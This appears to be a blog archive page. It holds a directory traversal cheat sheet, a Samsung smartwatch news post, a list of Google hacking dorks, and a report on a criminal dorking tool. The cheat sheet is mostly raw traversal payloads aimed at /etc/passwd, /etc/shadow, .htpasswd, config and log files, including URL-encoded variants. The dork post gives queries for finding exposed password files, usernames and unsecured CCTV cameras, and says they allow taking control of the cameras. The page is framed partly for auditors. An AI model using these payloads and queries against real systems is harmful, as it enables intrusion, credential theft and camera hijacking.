Showing posts with label DIY Google Dorks. Show all posts
Showing posts with label DIY Google Dorks. Show all posts

Monday, 25 May 2015

Directory Traversal Attack Cheat Sheet for Application Penetration Test

 

Are attackers dot-dot-slashing their way into your data?
About as simple to fix as they are to exploit, directory traversal vulnerabilities stand as a persistent threat in the application environment. Yet it is one that many developers and even security teams are unaware can lead attackers to gain valuable information about how a system is organized, to get access to sensitive files on the application server, or even to easily leverage to start other attacks on that server or the rest of the network. 

According to Imperva's most recent "Web Application Attack Report," released last month, directory traversal attacks against retail Web applications made up 31 percent of the attacks compared to the eight most prevalent types of attacks, and they made up 36 percent of attacks against all other industries' Web apps. In retail, that number lagged behind a whopping 53 percent of SQL injection attacks, but in other verticals it even led SQLi, which only made 27 percent of attacks. Meanwhile, secure hosting firm FireHost also reported last month in its Superfecta attack statistics about four major attacks it commonly blocks -- XSS, directory traversal, cross-site request forgery, and SQL injection -- directory traversal ranked second behind XSS, making up 23 percent of the 9.8 million attacks blocked from these four major categories using its IP Reputation Management system.

Here I have attached most important Directory Traversal Attack Cheat Sheet for info-sec auditors and developers. 

/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
———————————————————————————————————————————-
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
———————————————————————————————————————————-
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
———————————————————————————————————————————-
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
———————————————————————————————————————————-
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
———————————————————————————————————————————-
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
———————————————————————————————————————————-
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
———————————————————————————————————————————-
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
———————————————————————————————————————————-
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
———————————————————————————————————————————-
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
———————————————————————————————————————————-
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Posted by at No comments:
Labels: , , , , ,

Thursday, 5 September 2013

Pranav Mistry: Samsung Galaxy Gear smartwatch is packed with technologies from the next decade

Pranav Mistry, head of the think tank team, Samsung Research America points to the so-called 'Memographer' camera on a Samsung Galaxy Gear smartwatch during its launch at the 'Samsung UNPACKED 2013 Episode 2' at the IFA consumer electronics fair in Berlin, September 4, 2013. The IFA consumer electronics and home appliances fair will open its doors to the public from September 6 till 11 in the German capital. REUTERSBERLIN: Samsung Electronics unveiled its highly anticipated digital wristwatch that can snap photos, track workouts and use an array of apps - gadgetry that the company hopes will catapult it into a market of smart portable devices that leave cellphones in users' pockets.

Named the Samsung Galaxy Gear, the so-called smartwatch will join Google Glass as the latest example of wearable technology. The watch is synced to a cellphone, allowing users to answer calls and receive text messages from their wrists. The timing of the release could also give Samsung a leg up over Apple, which has yet to unveil a similar device but has long been rumored to be working on one.

At a much-hyped unveiling ceremony ahead of Berlin's Internationale Funkausstellung, one of the world's largest trade shows for consumer electronics, Samsung's head of mobile communications, JK Shin, introduced the device by pretending to receive a text message on stage.

"Don't forget to mention Android," Shin's message read.

He then raised his left arm, exposing the watch to applause from both the Berlin crowd and people in Times Square in New York, who were patched into the event via a video stream. Like other smartphones and tablets Samsung produces, Gear runs on Google's Android operating system.

From the Gear's small screen, which measures 1.63 inches diagonally, users can also receive emails, share pictures and use apps designed for Gear. It does not, however, function as a stand-alone device and must be paired with a Samsung phone or tablet.

Pranav Mistry, the head of research at Samsung Research America, said the watch was "packed with technologies from the next decade."

The watch has a rubbery wristband in which a small 1.9-megapixel camera is embedded. Its display surface has stainless steel bezels with four visible screws in each corner.

The watch is activated by pressing a button on the outer right side of the display or aiming the wristband lens at an object. A gentle swipe downward quickly turns on the camera, a feature Samsung calls the "Memographer."

"This is a feature that changes the way we interact, the way we express and the way we capture," Mistry said.

From the home screen, swiping upward brings up a number pad where a user can make a call. Because a gyroscope and accelerometer detect the Gear's movement, a user can answer calls by lifting his wrist to his ear.

"We have uniquely positioned the speakers and microphones so you can talk as you would on a regular phone," Mistry said.

The Gear is set to be released worldwide next month, although neither Shin nor Mistry gave a date. Also under wraps was the cost, something many believe could be a determining factor in whether the next-generation technology hits home with consumers who have historically been reluctant to adopt such "wearables of tomorrow," as Mistry called the Gear.

Samsung, which overtook Apple last year as the world's largest producer of smartphones, got into the watch business in 1999 with a model that consumers shunned.

Galaxy Gear has 512 megabytes of RAM and an internal memory of four gigabytes. It has an 800-megahertz, single-core central processing unit and weighs 2.6 ounces. Available colors include lime green, oatmeal beige, wild orange, mocha gray, jet black and rose gold.
Posted by at No comments:
Labels: , ,

Friday, 30 August 2013

 
Robots.txt is a text (not html) file you put on your site to tell search engine which pages you would like them not to visit. Robots.txt is by no means mandatory for search engines but generally search engines obey what they are asked not to do.
 
Now if this is not configured properly, then there are chances hacker tries to find exploitable targets and sensitive data by using search engines which is known as Google Hacking. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.
 
Information that the Google Hacking Database identifies:
 
 * Files containing passwords
 * Files containing usernames
 * Advisories and server vulnerabilities
 * Error messages that contain sensitive information
 * Sensitive directories
 * Vulnerable servers
 * Web server detection
 * Control of CCTV Cameras
 
Trying to completely update this GHDB soon, So you can refer this post to find latest attack pattern.


GHDB: Files containing passwords

This search show “password” files which contain encrypted/hashed/cleartext passwords. A password cracker can decrypt the encrypted/hashed password faster than Elvis eating jelly doughnuts. Sometimes you will get FULL ADMIN access...

1. inurl:"/root/etc/passwd" intext:"home/*:"
2. intitle:index.of passwd passwd.bak
3. intitle:index.of master.passwd
4. intitle:”Index of” pwd.db
5. intitle:”Index of” “.htpasswd” htpasswd.bak
6. intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c
7. intitle:”Index of” spwd.db passwd -pam.conf
8. intitle:”Index of..etc” passwd
9. intitle:index.of config.php
10. index.of passlist
11. intitle:index.of administrators.pwd
12. filetype:sql insite:pass && user

GHDB: Files containing usernames

This search reveals userlists, username of different types of user like end user account, administrative user account.

1. inurl:admin inurl:userlist
2. inurl:admin filetype:asp inurl:userlist
3. filetype:reg reg HKEY_CURRENT_USER username
4. filetype:conf inurl:proftpd.conf -sample
5. inurl:php inurl:hlstats intext:”Server Username”
6. intext:”SteamUserPassphrase=” intext:”SteamAppUser=” -”username” -”user”
7. filetype:log username putty

GHDB: Control of CCTV Cameras

This search reveals web cameras, If authentication is not enable then you can take controll of web cameras.

1. inurl:/control/userimage.html
2. intitle:"active webcam page"
3. inurl:camctrl.cgi
4. allintitle:Brains, Corp. camera
5. intitle:"supervisioncam protocol"
6. allinurl:index.htm?cus?audio
7. intitle:"Browser Launch Page"
8. inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi
9. intitle:"Live NetSnap Cam-Server feed"
10. intitle:"iVISTA.Main.Page"
11. intitle:"V-Gear BEE"
12. intitle:"EvoCam" inurl:"webcam.html"
13. intitle:"i-Catcher Console" Copyright "iCode Systems"
14. intitle:"toshiba network camera - User Login"
15. intitle:"DVR Web client"
16. inurl:netw_tcp.shtml
17. camera linksys inurl:main.cgi
Posted by at No comments:
Labels: , , , ,

Friday, 10 May 2013

Hacking with new DIY Google Dorks based hacking tool

A new version of DIY Google Dorks based hacking tool has been released, it is an extremely useful tool for reconnaissance of targets.

A Webroot blog post announced that a new version of DIY Google Dorks based hacking tool has been released in the wild and it could be used for mass website analysis, the power of the popular search engine could be exploited for information gathering during the reconnaissance phase of an attack. Similar tools could be used to acquire information on target environments by an attacker or by the pen tester to evaluate the architecture is starting to test. The availability of the DIY Google Dorks based hacking tool allows to ill-intentioned to acquire precious information on remotely exploitable websites, data that could be collected to compromise them for example deploying a malicious exploit kit or exploiting known vulnerabilities. The tool relies on Google Dorks the tools to allow a target evaluation, in particular the DIY Google Dorks based hacking tool has built-in features that can be used to evaluate the possibility to perform a SQL injection attack or to discover all the targets that aren’t protected by a CAPTCHA challenge mechanism. As usual the project appears under continuous development and the authors are still working on it to improve its capabilities with new features such as the possibility to evaluate the vulnerability to a custom malicious exploits. Composing specifically crafted queries in Google it is possible to reveal sensitive information essential for the success of an attack, thanks to the use of the advanced operator, the dorking, is possible to retrieve a huge quantity of information on a target such as:
  • User’s credentials.
  • Sensitive documents.
  • Admin login page.
  • Email lists.
The syntax for using advanced operator in Google is
Operator_name:keyword
Following some sample of keyword/advance operator:
Allintext Searches for occurrences of all the keywords given
Intext Searches for the occurrences of keywords all at once or one at a time
Inurl Searches for a URL matching one of the keywords
Allinurl Searches for a URL matching all the keywords in the query
Intitle Searches for occurrences of keywords in URL all or one
Allintitle Searches for occurrences of keywords all at a time
Site Specifically searches that particular site and lists all the results for that site
filetype Searches for a particular filetype mentioned in the query
Link Searches for external links to pages
Numrange Used to locate specific numbers in your searches
Daterange Used to search within a particular date range
Using more complex queries an attacker could obtain a series of information on the status of the target, for example to discover if it has been already “backdoored” and discovery which are the vulnerability that can potentially affect the system. The Google hacking database provides various examples of queries that can help a hacker to find vulnerable servers, to gain information on the target, to explore sensitive directories finding vulnerable files, to find password files or to find sensitive online shopping info.
inurl:”r00t.php”  – This dork finds websites that were hacked, backdoored and contains their system information allintext:”fs-admin.php – A foothold using allintext:”fs-admin.php” shows the world readable directories of a plug-in that enables WordPress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched. filetype:config inurl:web.config inurl:ftp – This google dork to find sensitive information of MySqlServer , “uid, and password” in web.config through ftp..filetype:config inurl:web.config inurl:ftp
The above dorks are just simple examples of the power of these search strings, just after 10 minutes playing with them user has the perception of the infinite possibilities that Google provides to an attacker. Now imagine a single DIY Google Dorks based hacking tool  that allows to automatize all this queries, without having particular knowledge on Google dorks … it’s the hacker heaven, what do you think about? The DIY Google Dorks based hacking tool proposed by Dancho Danchev offers a complete suite to automate the process of remote inspection of targets and their exploit, the instrument works on desktop and could be  also integrated with popular browsers to fool the search engines into thinking that generated traffic is legitimate traffic.
DIY Google Dorks based hacking tool 1
  The price for the DIY Google Dorks based hacking tool is very cheap compared to the advantage deriving from its use, one license costs $10 to pay using the Liberty Reserve currency, or $11 to pay using Western Union transfer. The license are linked to specific host due a hardware-based ID restriction, but the authors also offers an unlimited license for $20 in Liberty Reserve, or $20 in Western Union transfer.
DIY Google Dorks based hacking tool 2
 DIY Google Dorks based hacking tool 3
Cyber criminals can exploit hundreds of thousands of legitimate Web sites is various ways and tools such as the DIY Google Dorks based hacking tool facilitate attacks. Dancho Danchev in his interesting post described the principal techniques used to compromise website:
  • Use of search engine reconnaissance through DIY SQL/RFI (Remote File Inclusion) tools or botnets, the category includes a wide range of application that automatically exploit improper configured websites such as  blogging platforms or well known CMS.
  • Use of data mined or purchased stolen accounting data, cyber criminals could gather information on malware infected machine, looking for login credentials to be automatically abused with malicious scripts and actual executables getting hosted on legitimate websites in an attempt to trick a security solution’s IP reputation process.
  • Active exploitation of server farms – criminals try to infect the larger number of low profile websites as possible, a common practice observed by security researchers is the exploiting of servers that host large number of domains, for example using commercially available Apache backdoors.
Cybercrime underground is in offering all necessary to organize a fraud without having particular knowledge of various technological platforms (e.g. Mobile) and proposing a new efficient model of sales such as the FaaS… it is crucial to follow the black market evolution to avoid shocking surprises.
Posted by at No comments:
Labels: , , , ,
Subscribe to: Posts (Atom)